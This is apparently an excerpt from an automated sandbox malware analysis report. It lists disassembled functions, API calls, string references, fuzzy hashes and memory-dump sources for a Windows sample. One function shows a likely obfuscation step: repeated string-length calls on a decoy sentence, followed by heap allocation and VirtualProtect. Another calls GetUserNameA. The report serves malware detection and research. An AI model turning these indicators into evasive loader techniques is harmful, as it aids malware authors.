API String ID: 3303180142-2474693000
Opcode ID: d9f64af192701651e3bbdadd8addfb8b83be8fb6e5f530136e6d9844dae8fe69
Instruction ID: 6baa37401049116b5146a5d113801e344baea57afb1a7c9b7ed44025e01b5877
Opcode Fuzzy Hash: d9f64af192701651e3bbdadd8addfb8b83be8fb6e5f530136e6d9844dae8fe69
Instruction Fuzzy Hash: 72018021E093418ADB10FBBA655122D6AA4AF04348F10847FE446B72D2DB3C8F44979E

Function 0040537D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 004053C1

Strings

LDE, xrefs: 0040537F
ios_base::failbit set, xrefs: 0040537D

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: LDE$ios_base::failbit set
API String ID: 4194217158-683069099
Opcode ID: 7858811afff9cfa7cff92d959711b5aeb40893614c132c8aafa3c0ce9202e9fc
Instruction ID: f1a8193040c83a5324d22773f6ba2ae11c3b4b60ca4fe473ea8b5c416a2e81c8
Opcode Fuzzy Hash: 7858811afff9cfa7cff92d959711b5aeb40893614c132c8aafa3c0ce9202e9fc
Instruction Fuzzy Hash: F6F0B47260471436C6201656B802BD7FADCCF81764F14843FFD44A7682D6FD988146AD

Function 00438BBA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00438BC1

Strings

RCC, xrefs: 00438BF3
MOC, xrefs: 00438BE4

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: bb70595c83a73ca183933c17e8e76bfe55f653302c0f2a05ffda87f9f449bfdc
Instruction ID: c0c95ecbed0904f885d16acc3151bad6ee599582c46da71e2741fb237d5e9a9c
Opcode Fuzzy Hash: bb70595c83a73ca183933c17e8e76bfe55f653302c0f2a05ffda87f9f449bfdc
Instruction Fuzzy Hash: C5F0AF74511308CFCB62BB56C0015DDB760EF19744F41A09BF8446B321CBBC9E828BAE

Function 0041C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 0041C506
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041C518

Strings

pScheduler, xrefs: 0041C510

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Concurrency::details::DestroyProcessorProxy::RootSchedulerVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 117384223-923244539
Opcode ID: 4b7a86087f93061993344da33e43fe5c6df47153dcd70b24bee2b7b1eb778590
Instruction ID: bc30e05d9ccc38d6b2e53117d75c0b5bb582ae4ebaed5674429a00b7ac5323c5
Opcode Fuzzy Hash: 4b7a86087f93061993344da33e43fe5c6df47153dcd70b24bee2b7b1eb778590
Instruction Fuzzy Hash: 97F02770A00214ABCB14FA65DC92DEE73B85E44304710412FA002635C1CB7CFD46C78C

Function 0041682A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041684C
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041685F

Strings

pContext, xrefs: 00416857

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 21b94bcbe6968f044384a4b3e5529619591a0e185bae184858573cf41250730d
Instruction ID: 3b3e815d18db77763263b426c2bd08042a8c11690334cd2c3fbc8980a7fc702d
Opcode Fuzzy Hash: 21b94bcbe6968f044384a4b3e5529619591a0e185bae184858573cf41250730d
Instruction Fuzzy Hash: E9E02235B0020867CF00F72ADC59E9EB7B9AEC4718714002BA902A3391DBB8E941C6D8

Function 0040CE55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 0040CE16
Concurrency::details::ResourceManager::InitializeSystemInformation.LIBCONCRT ref: 0040CE29

Part of subcall function 0040D33D: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 0040D34C
Part of subcall function 0040D33D: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0040D360
Part of subcall function 0040D33D: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 0040D381
Part of subcall function 0040D33D: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0040D3B8
Part of subcall function 0040D33D: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0040D3FB
Part of subcall function 0040D33D: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 0040D4EE

Strings

d:E, xrefs: 0040CE0E

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Concurrency::details::Manager::Resource$Information$Affinity$ApplyRestrictionsSystemTopology$AcquireCaptureCleanupConcurrency::details::_InitializeLock::_ProcessReentrantRetrieveVersion
String ID: d:E
API String ID: 2525731152-2474693000
Opcode ID: 91f35e0dedfe8c2437032f6481ed08cdf0ce7b4571006c603449a24c7d55b8d5
Instruction ID: 53a375f127e55de49da51227f4c08fdacf9228b3107fd1ab029ccc1e533a6c4f
Opcode Fuzzy Hash: 91f35e0dedfe8c2437032f6481ed08cdf0ce7b4571006c603449a24c7d55b8d5
Instruction Fuzzy Hash: 74E01A75A04300C7EB10EF76E85572A72A0AF1438BF40443AE484B73E2D77DEE06964E

Function 0040DF97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040DFC7

Strings

pScheduler, xrefs: 0040DFBF
version, xrefs: 0040DFAC

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: c9b660260850b61a89b261ffcbd6fdb3af4fb44808f36dbaed9d41d306711d37
Instruction ID: 574127264731145d46d3661d02369596a2b19b143ab0be691d2a6bbc361d4106
Opcode Fuzzy Hash: c9b660260850b61a89b261ffcbd6fdb3af4fb44808f36dbaed9d41d306711d37
Instruction Fuzzy Hash: E7E04F30840209B6CF10AAA5D80AB997768AF04348F20C037B802310D08BBC969DCA9D

Function 00422BEA Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00401D5E,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00401D5E,00000000), ref: 00422C80
GetLastError.KERNEL32 ref: 00422C8E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00401D5E,00000000), ref: 00422CE9

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 5a9642496257195a7c71f6f42949c5f99bca778253cfc03a7e420c7dc4883e2c
Instruction ID: 275ff6537ba901afd6ba579d7e2eddcb73f7ab20ef7cdca01bdc50d980c6b1a8
Opcode Fuzzy Hash: 5a9642496257195a7c71f6f42949c5f99bca778253cfc03a7e420c7dc4883e2c
Instruction Fuzzy Hash: EE412630700266BFCF218F65E944BAF7BB4EF01310F54416AE855AB2A1DBB88D01CB99

Analysis Process: 169F.tmp.exePID: 6480, Parent PID: 5352COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	63.4%
Signature Coverage:	1%
Total number of Nodes:	1523
Total number of Limit Nodes:	35

Executed Functions

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404648
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0041649B), ref: 00404657
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0041649B), ref: 0040465E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040466C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404677
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404682
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040468D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404698
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046AC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046B7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046CD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046D8
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
strlen.MSVCRT ref: 00404740
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 62a93e331a1829f9f90dde32a5a87501dfa4acb2aa956d2fcd824e40e1e2fd2e
Instruction ID: 568009891a73934414478d5ea9ac1d95815f38c27f73e6007f327c9a8c174b1c
Opcode Fuzzy Hash: 62a93e331a1829f9f90dde32a5a87501dfa4acb2aa956d2fcd824e40e1e2fd2e
Instruction Fuzzy Hash: 1541AB79740624EBC71CAFE5EC89B997F71AB4C712BA0C062F90299190C7F9D5019B3E

Function 004172F0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
